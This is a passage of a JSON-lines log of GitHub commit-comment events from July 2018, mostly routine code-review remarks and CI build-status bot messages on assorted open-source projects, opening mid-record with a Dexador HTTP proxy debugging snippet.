auth, HTTPS\r\n\r\n```\r\n(dex:get \"https://www.google.com\" :proxy \"http://testuser:testpass@localhost:3128\" :verbose T)\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET https://www.google.com HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.google.com\r\nAccept: */*\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n"}},"created_at":"2018-07-25T13:10:27Z"}
{"id":"8016370568","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828684,"position":5,"line":18,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T13:10:46Z","updated_at":"2018-07-25T13:10:46Z","author_association":"NONE","body":"валидация после добавления в коллекцию (см. выше)"}},"created_at":"2018-07-25T13:10:46Z"}
{"id":"8016370986","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":29828687,"position":null,"line":null,"path":null,"commit_id":"9575cc89801bd4e07f3f7362797001d7d8199bfe","created_at":"2018-07-25T13:10:50Z","updated_at":"2018-07-25T13:10:50Z","author_association":"COLLABORATOR","body":"[cha.ses.cifs_color_en.pdf](https://github.com/SUSE/doc-ses/files/2228000/cha.ses.cifs_color_en.pdf)\r\n"}},"created_at":"2018-07-25T13:10:50Z"}
{"id":"8016381494","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29828709,"position":null,"line":null,"path":null,"commit_id":"aab72c2f51066ae25d9081c071b34330f7b3b9cc","created_at":"2018-07-25T13:12:41Z","updated_at":"2018-07-25T13:12:41Z","author_association":"CONTRIBUTOR","body":"These look great, thanks."}},"created_at":"2018-07-25T13:12:41Z"}
{"id":"8016389141","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29828722,"position":null,"line":null,"path":null,"commit_id":"77ff9c2fade10f218788f50b59b3ded757b78c72","created_at":"2018-07-25T13:14:01Z","updated_at":"2018-07-25T13:14:01Z","author_association":"CONTRIBUTOR","body":"Stony soil: j'ai utilisé sol pierreux (traduction litérale). On peut mettre sol caillouteux si vous préférez "}},"created_at":"2018-07-25T13:14:01Z"}
{"id":"8016395186","type":"CommitCommentEvent","actor":{"login":"Jopeser"},"repo":{"name":"Jopeser/frogger"},"payload":{"comment":{"id":29828731,"position":null,"line":null,"path":null,"commit_id":"44caf9243bdbed6fd8c6d3ac77814b9c14761786","created_at":"2018-07-25T13:15:02Z","updated_at":"2018-07-25T13:15:02Z","author_association":"OWNER","body":"Error: Collider is in front of Trucks driving to the right!"}},"created_at":"2018-07-25T13:15:02Z"}
{"id":"8016398217","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29828742,"position":null,"line":null,"path":null,"commit_id":"7ce0a8a86e874defe65321fbe31df8f52d67b364","created_at":"2018-07-25T13:15:33Z","updated_at":"2018-07-25T13:15:33Z","author_association":"CONTRIBUTOR","body":"Comments:\r\n\r\n1. for:\r\n\r\nHeightWeightSum <- favstats(~ Weight | Height, data = HeightsWeights)\r\n+head(summaryHeightsWeights)\r\n+gf_point(mean ~ as.numeric(Height), data = HeightWeightSum) %>%\r\n\r\nplease use Weight ~ Height.  \r\n\r\n2. I'd suggest calculating the chisq using the Alternate method as well as providing a vector of probabilities."}},"created_at":"2018-07-25T13:15:33Z"}
{"id":"8016398574","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29828746,"position":30,"line":121,"path":"packages/compiler-cli/test/ngcc/ngcc_spec.ts","commit_id":"3c2cce28b621197b6ef579860c0f8720fadc3eec","created_at":"2018-07-25T13:15:37Z","updated_at":"2018-07-25T13:15:37Z","author_association":"OWNER","body":"😱 \r\n"}},"created_at":"2018-07-25T13:15:37Z"}
{"id":"8016404279","type":"CommitCommentEvent","actor":{"login":"zyd20180725"},"repo":{"name":"zyd20180725/SpringcloudConfig"},"payload":{"comment":{"id":29828754,"position":null,"line":null,"path":null,"commit_id":"fc0b3903073718bf0e7240f69f69c791d5b2cf87","created_at":"2018-07-25T13:16:33Z","updated_at":"2018-07-25T13:16:33Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-25T13:16:33Z"}
{"id":"8016405327","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29828756,"position":39,"line":39,"path":"LuaUI/Widgets/gui_missile_select.lua","commit_id":"3b160d49220f7ef6d847b2e24989f200b2f3bdbc","created_at":"2018-07-25T13:16:43Z","updated_at":"2018-07-25T13:16:43Z","author_association":"MEMBER","body":"Current code is decent enough IMO. My idea was unit rules params as well, it doesn't sound too ugly though:\r\n\r\n```lua\r\nfor i = 1, 4 do\r\n  toSelect[#toSelect + 1] = spGetUnitRulesParam(siloID, \"missile_\" .. i)\r\nend\r\n```\r\n(plus the gadget code to actually add the params but that's two Set lines)"}},"created_at":"2018-07-25T13:16:43Z"}
{"id":"8016407032","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828762,"position":9,"line":9,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:17:00Z","updated_at":"2018-07-25T13:17:00Z","author_association":"NONE","body":"This property name is too generic."}},"created_at":"2018-07-25T13:17:00Z"}
{"id":"8016407700","type":"CommitCommentEvent","actor":{"login":"gregorydossantos"},"repo":{"name":"gregorydossantos/Studies-in-Java"},"payload":{"comment":{"id":29828763,"position":null,"line":null,"path":null,"commit_id":"d6f223bcf0bf6d01d192adee4ff21aba7122776b","created_at":"2018-07-25T13:17:08Z","updated_at":"2018-07-25T13:17:08Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-25T13:17:08Z"}
{"id":"8016410975","type":"CommitCommentEvent","actor":{"login":"EricMason24"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29828768,"position":null,"line":null,"path":null,"commit_id":"83a1576df9914760699643ce02af6db2272b2c7a","created_at":"2018-07-25T13:17:41Z","updated_at":"2018-07-25T13:17:41Z","author_association":"COLLABORATOR","body":"lol"}},"created_at":"2018-07-25T13:17:41Z"}
{"id":"8016413038","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29828773,"position":null,"line":null,"path":null,"commit_id":"ad23c9ef2357081c0c764016638776e60bb210ad","created_at":"2018-07-25T13:18:02Z","updated_at":"2018-07-25T13:18:02Z","author_association":"NONE","body":"ooh it's becoming less ass & better (due to experience)\r\nkeep it up, you'll get there :3 \r\n(apart from making them balanced it seems)"}},"created_at":"2018-07-25T13:18:02Z"}
{"id":"8016416856","type":"CommitCommentEvent","actor":{"login":"tony-blockchain"},"repo":{"name":"blockchain/blockchain-wallet-v4-frontend"},"payload":{"comment":{"id":29828785,"position":13,"line":13,"path":"packages/blockchain-info-components/src/Tooltip/TooltipHost.js","commit_id":"c827847a9468327e1c922c96f1c9f3e6795d7159","created_at":"2018-07-25T13:18:41Z","updated_at":"2018-07-25T13:18:41Z","author_association":"CONTRIBUTOR","body":"is this needed here?"}},"created_at":"2018-07-25T13:18:41Z"}
{"id":"8016419608","type":"CommitCommentEvent","actor":{"login":"remialvado"},"repo":{"name":"wizbii/pipeline"},"payload":{"comment":{"id":29828788,"position":null,"line":null,"path":null,"commit_id":"0d61cf3f02a55d7ab92220ec96c8886cd88382cb","created_at":"2018-07-25T13:19:09Z","updated_at":"2018-07-25T13:19:09Z","author_association":"CONTRIBUTOR","body":"Il faut aussi que tu configures le dernier service systemd : celui qui décide du nombre d'instances d'un service. Sinon, tu n'auras qu'une instance pour tes queues en `--direct` et ça va ramer sévère :)"}},"created_at":"2018-07-25T13:19:09Z"}
{"id":"8016423686","type":"CommitCommentEvent","actor":{"login":"jstettner"},"repo":{"name":"blockchain/blockchain-wallet-v4-frontend"},"payload":{"comment":{"id":29828793,"position":13,"line":13,"path":"packages/blockchain-info-components/src/Tooltip/TooltipHost.js","commit_id":"c827847a9468327e1c922c96f1c9f3e6795d7159","created_at":"2018-07-25T13:19:49Z","updated_at":"2018-07-25T13:19:49Z","author_association":"MEMBER","body":"No, sorry. forgot to take it out. "}},"created_at":"2018-07-25T13:19:49Z"}
{"id":"8016423759","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828795,"position":18,"line":18,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:19:49Z","updated_at":"2018-07-25T13:19:49Z","author_association":"NONE","body":"You don't need additional dependency for making HTTP requests, simply use [`fetch()`](https://developers.google.com/web/updates/2015/03/introduction-to-fetch)"}},"created_at":"2018-07-25T13:19:49Z"}
{"id":"8016427327","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828802,"position":9,"line":9,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:20:25Z","updated_at":"2018-07-25T13:20:25Z","author_association":"NONE","body":"A much better name will be `laureates`."}},"created_at":"2018-07-25T13:20:25Z"}
{"id":"8016428914","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29828807,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:20:40Z","updated_at":"2018-07-25T13:20:40Z","author_association":"COLLABORATOR","body":"That is right this formula is legal for Cinelog-C (that is why Ektar lut designed for cinelog works good with it) but for correct color there have to be alexa space primaries used in matrix calculations on data."}},"created_at":"2018-07-25T13:20:40Z"}
{"id":"8016429469","type":"CommitCommentEvent","actor":{"login":"remialvado"},"repo":{"name":"wizbii/pipeline"},"payload":{"comment":{"id":29828808,"position":null,"line":null,"path":null,"commit_id":"0d61cf3f02a55d7ab92220ec96c8886cd88382cb","created_at":"2018-07-25T13:20:45Z","updated_at":"2018-07-25T13:20:45Z","author_association":"CONTRIBUTOR","body":"il faudra aussi surveiller la consommation de RAM sur les serveurs avec des pipelines : chaque process a un coût non négligeable : c'est la principale raison pour laquelle je n'ai pas fait une archi avec x consumers directs par queue"}},"created_at":"2018-07-25T13:20:45Z"}
{"id":"8016430750","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29828812,"position":82,"line":82,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:20:58Z","updated_at":"2018-07-25T13:20:58Z","author_association":"NONE","body":"Style consistency (across the file, there's a few more): put the star with the type or the argument (I personally prefer it the argument due to the ambiguity in `int* foo, bar;` vs `int *foo, bar`)"}},"created_at":"2018-07-25T13:20:58Z"}
{"id":"8016433459","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828818,"position":25,"line":25,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:21:26Z","updated_at":"2018-07-25T13:21:26Z","author_association":"NONE","body":"Why this function is defined that way? Why not `selectCategory(event) {`?"}},"created_at":"2018-07-25T13:21:26Z"}
{"id":"8016435736","type":"CommitCommentEvent","actor":{"login":"deathsythe47"},"repo":{"name":"KirahGhnarok/BlueprintWebsite"},"payload":{"comment":{"id":29828822,"position":null,"line":null,"path":null,"commit_id":"fe4a0955946867efcc86cda258aa73053fb96741","created_at":"2018-07-25T13:21:49Z","updated_at":"2018-07-25T13:21:49Z","author_association":"NONE","body":"This changed my life"}},"created_at":"2018-07-25T13:21:49Z"}
{"id":"8016437684","type":"CommitCommentEvent","actor":{"login":"tony-blockchain"},"repo":{"name":"blockchain/blockchain-wallet-v4-frontend"},"payload":{"comment":{"id":29828828,"position":null,"line":null,"path":null,"commit_id":"c827847a9468327e1c922c96f1c9f3e6795d7159","created_at":"2018-07-25T13:22:09Z","updated_at":"2018-07-25T13:22:09Z","author_association":"CONTRIBUTOR","body":"Looks awesome!"}},"created_at":"2018-07-25T13:22:09Z"}
{"id":"8016438654","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828829,"position":5,"line":5,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:22:19Z","updated_at":"2018-07-25T13:22:19Z","author_association":"NONE","body":"Generally, an indentation of 2 spaces is recommended not 4."}},"created_at":"2018-07-25T13:22:19Z"}
{"id":"8016438931","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29828830,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T13:22:21Z","updated_at":"2018-07-25T13:22:21Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T13:22:21Z"}
{"id":"8016439952","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828833,"position":32,"line":32,"path":"src/containers/App.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:22:32Z","updated_at":"2018-07-25T13:22:32Z","author_association":"NONE","body":"The indentation here is strange."}},"created_at":"2018-07-25T13:22:32Z"}
{"id":"8016441617","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29828837,"position":null,"line":null,"path":null,"commit_id":"83e2e8199f08bc4fb0cd9cb7d000680524a4bbde","created_at":"2018-07-25T13:22:49Z","updated_at":"2018-07-25T13:22:49Z","author_association":"OWNER","body":"I managed to port the TeamNexus HAL and it works pretty well.\r\n\r\nI will clean the code up and then push it later on when I have some more free time."}},"created_at":"2018-07-25T13:22:49Z"}
{"id":"8016482003","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29828917,"position":114,"line":114,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:29:40Z","updated_at":"2018-07-25T13:29:40Z","author_association":"NONE","body":"I'd use int32_t in the unlikely case that `sizeof(int) < sizeof(int32_t)` (e.g. some 8/16bit architechtures - I think ansi C only guarantees 16bit)"}},"created_at":"2018-07-25T13:29:40Z"}
{"id":"8016487740","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29828927,"position":32,"line":32,"path":"src/containers/Form.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:30:36Z","updated_at":"2018-07-25T13:30:36Z","author_association":"NONE","body":"Instead of nesting the main logic here, use a guard clause ;)\r\n```js\r\nif (!this.props.data) {\r\n  return [];\r\n}\r\nmain logic below...\r\n```"}},"created_at":"2018-07-25T13:30:36Z"}
{"id":"8016491676","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":29828937,"position":24,"line":156,"path":"src/Tracy/BlueScreen.php","commit_id":"fa3dabf3a329983feb8fadf185d057b4cd2e3e69","created_at":"2018-07-25T13:31:15Z","updated_at":"2018-07-25T13:31:15Z","author_association":"CONTRIBUTOR","body":"Maybe remove `continue` before `catch` and move code after the `catch` inside the `catch`."}},"created_at":"2018-07-25T13:31:15Z"}
{"id":"8016493178","type":"CommitCommentEvent","actor":{"login":"ashfurrow"},"repo":{"name":"danger/peril"},"payload":{"comment":{"id":29828942,"position":null,"line":null,"path":null,"commit_id":"7fcc286502f52a1b48cb422b79e2aa5bace8a4b0","created_at":"2018-07-25T13:31:30Z","updated_at":"2018-07-25T13:31:30Z","author_association":"MEMBER","body":"❤️ "}},"created_at":"2018-07-25T13:31:30Z"}
{"id":"8016496650","type":"CommitCommentEvent","actor":{"login":"tavisca-achougule"},"repo":{"name":"RajNayyar/Banking-System-using-C-hash"},"payload":{"comment":{"id":29828948,"position":25,"line":25,"path":"BankingSystem/Banking.cs","commit_id":"37fb507296820524898f543721c0d713414775a8","created_at":"2018-07-25T13:32:06Z","updated_at":"2018-07-25T13:32:06Z","author_association":"NONE","body":"@RajNayyar TryParse would be a better option here."}},"created_at":"2018-07-25T13:32:06Z"}
{"id":"8016498283","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29828954,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T13:32:23Z","updated_at":"2018-07-25T13:32:23Z","author_association":"NONE","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T13:32:23Z"}
{"id":"8016498294","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":29828955,"position":16,"line":311,"path":"src/Tracy/Debugger.php","commit_id":"fa3dabf3a329983feb8fadf185d057b4cd2e3e69","created_at":"2018-07-25T13:32:23Z","updated_at":"2018-07-25T13:32:23Z","author_association":"CONTRIBUTOR","body":"Same thing, the code after the `catch` can now be moved inside the `catch`."}},"created_at":"2018-07-25T13:32:23Z"}
{"id":"8016502026","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"fbrosson/haikuports"},"payload":{"comment":{"id":29828965,"position":null,"line":null,"path":null,"commit_id":"da1fe3054e2ff978104593d47567a7b45e9af7cf","created_at":"2018-07-25T13:33:02Z","updated_at":"2018-07-25T13:33:02Z","author_association":"NONE","body":"Actually we decided in the ticket that the correct way to patch would be to make the locker recursive. So, sorry, but maybe back this patch out for now, and I'll try to write a more correct one later (since @kallisti5 is too busy)."}},"created_at":"2018-07-25T13:33:02Z"}
{"id":"8016505458","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29828978,"position":143,"line":143,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:33:35Z","updated_at":"2018-07-25T13:33:35Z","author_association":"NONE","body":"nit pick, `>=`"}},"created_at":"2018-07-25T13:33:35Z"}
{"id":"8016516302","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829003,"position":145,"line":145,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:35:22Z","updated_at":"2018-07-25T13:35:22Z","author_association":"NONE","body":"`unlikely` ?"}},"created_at":"2018-07-25T13:35:22Z"}
{"id":"8016519702","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29829012,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:35:56Z","updated_at":"2018-07-25T13:35:56Z","author_association":"NONE","body":"Somehow expand on the BMDfilm profile to include the supplied lut? go to linear>BMDFilm>Cinelog-C in one hit? Maybe not possible."}},"created_at":"2018-07-25T13:35:56Z"}
{"id":"8016520362","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829013,"position":179,"line":179,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:36:03Z","updated_at":"2018-07-25T13:36:03Z","author_association":"NONE","body":"space missing after `if` and before `{`"}},"created_at":"2018-07-25T13:36:03Z"}
{"id":"8016521542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29829017,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T13:36:15Z","updated_at":"2018-07-25T13:36:15Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2342 of 2342 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T13:36:15Z"}
{"id":"8016521837","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829019,"position":184,"line":184,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:36:18Z","updated_at":"2018-07-25T13:36:18Z","author_association":"NONE","body":"as above, spaces missing"}},"created_at":"2018-07-25T13:36:18Z"}
{"id":"8016523169","type":"CommitCommentEvent","actor":{"login":"nimabahrami"},"repo":{"name":"nimabahrami/nimabahrami.github.io"},"payload":{"comment":{"id":29829022,"position":null,"line":null,"path":null,"commit_id":"76c442d23f4e3d3210fe636c7bebcd393a713c69","created_at":"2018-07-25T13:36:32Z","updated_at":"2018-07-25T13:36:32Z","author_association":"OWNER","body":"https://nimabahrami.github.io"}},"created_at":"2018-07-25T13:36:32Z"}
{"id":"8016524118","type":"CommitCommentEvent","actor":{"login":"vRallev"},"repo":{"name":"evernote/android-job"},"payload":{"comment":{"id":29829024,"position":null,"line":null,"path":null,"commit_id":"d4efa10e1e2ddf5a6cacb22935c918bce478a65f","created_at":"2018-07-25T13:36:40Z","updated_at":"2018-07-25T13:36:40Z","author_association":"CONTRIBUTOR","body":"If loading a pref file takes more than 10 seconds, than I'd rather let the app crash than leaving it in a bad state."}},"created_at":"2018-07-25T13:36:40Z"}
{"id":"8016531760","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829036,"position":192,"line":192,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:37:56Z","updated_at":"2018-07-25T13:37:56Z","author_association":"NONE","body":"Potential integer division: double check if this is an integer or float type (maybe `100.0` or `100.0f`)"}},"created_at":"2018-07-25T13:37:56Z"}
{"id":"8016537381","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829046,"position":254,"line":254,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:38:52Z","updated_at":"2018-07-25T13:38:52Z","author_association":"NONE","body":"spaces"}},"created_at":"2018-07-25T13:38:52Z"}
{"id":"8016539802","type":"CommitCommentEvent","actor":{"login":"hennevogel"},"repo":{"name":"openSUSE/open-build-service"},"payload":{"comment":{"id":29829058,"position":23,"line":488,"path":"dist/obs-server.spec","commit_id":"77b0f32ce42b0cdbd9262fa0e36e0e884b9fc00c","created_at":"2018-07-25T13:39:16Z","updated_at":"2018-07-25T13:39:16Z","author_association":"MEMBER","body":":thought_balloon: why not `bin/rails` here too?"}},"created_at":"2018-07-25T13:39:16Z"}
{"id":"8016540485","type":"CommitCommentEvent","actor":{"login":"vlisivka"},"repo":{"name":"bit-shift/evdev"},"payload":{"comment":{"id":29829060,"position":null,"line":null,"path":null,"commit_id":"f78ee04f8b01c3fec4361d7492e1158b128e3a3c","created_at":"2018-07-25T13:39:23Z","updated_at":"2018-07-25T13:39:23Z","author_association":"NONE","body":"Why?"}},"created_at":"2018-07-25T13:39:23Z"}
{"id":"8016542409","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829063,"position":246,"line":246,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:39:43Z","updated_at":"2018-07-25T13:39:43Z","author_association":"NONE","body":"`const size_t size = sizeof(humidity_data_t);`"}},"created_at":"2018-07-25T13:39:43Z"}
{"id":"8016544267","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29829067,"position":253,"line":253,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T13:40:01Z","updated_at":"2018-07-25T13:40:01Z","author_association":"NONE","body":"see initialization proposal, then this is not needed."}},"created_at":"2018-07-25T13:40:01Z"}
{"id":"8016544371","type":"CommitCommentEvent","actor":{"login":"kanishka-azimi"},"repo":{"name":"databrary/databrary"},"payload":{"comment":{"id":29829068,"position":33,"line":98,"path":"src/Controller/Volume.hs","commit_id":"4df6d471682b2d3475e5ca111d02d07b7aee2b09","created_at":"2018-07-25T13:40:02Z","updated_at":"2018-07-25T13:40:02Z","author_association":"CONTRIBUTOR","body":"An alternative to lookupVolumeP could use a CPS style, where you provide success and error function, and hide the Permissioned type altogether. I like exposing Permissioned so far."}},"created_at":"2018-07-25T13:40:02Z"}
{"id":"8016544945","type":"CommitCommentEvent","actor":{"login":"hennevogel"},"repo":{"name":"openSUSE/open-build-service"},"payload":{"comment":{"id":29829069,"position":14,"line":75,"path":"dist/obsapidelayed","commit_id":"77b0f32ce42b0cdbd9262fa0e36e0e884b9fc00c","created_at":"2018-07-25T13:40:08Z","updated_at":"2018-07-25T13:40:08Z","author_association":"MEMBER","body":"Same here..."}},"created_at":"2018-07-25T13:40:08Z"}
{"id":"8016546966","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29829073,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:40:26Z","updated_at":"2018-07-25T13:40:26Z","author_association":"COLLABORATOR","body":">Somehow expand on the BMDfilm profile to include the supplied lut? go to linear>BMDFilm>Cinelog-C in one hit? Maybe not possible.\r\n\r\nIs possible but difficult and slow..."}},"created_at":"2018-07-25T13:40:26Z"}
{"id":"8016548102","type":"CommitCommentEvent","actor":{"login":"kanevk"},"repo":{"name":"SteinPowaaa/ReactSimpleWorkshop"},"payload":{"comment":{"id":29829080,"position":7,"line":7,"path":"src/containers/Table.js","commit_id":"1f5a97eceeb050cb7b188cb5ec62efa46907ac98","created_at":"2018-07-25T13:40:37Z","updated_at":"2018-07-25T13:40:37Z","author_association":"NONE","body":"Don't use the ternary operator `a ? b : c` for multi-lines. Use guard clause instead."}},"created_at":"2018-07-25T13:40:37Z"}
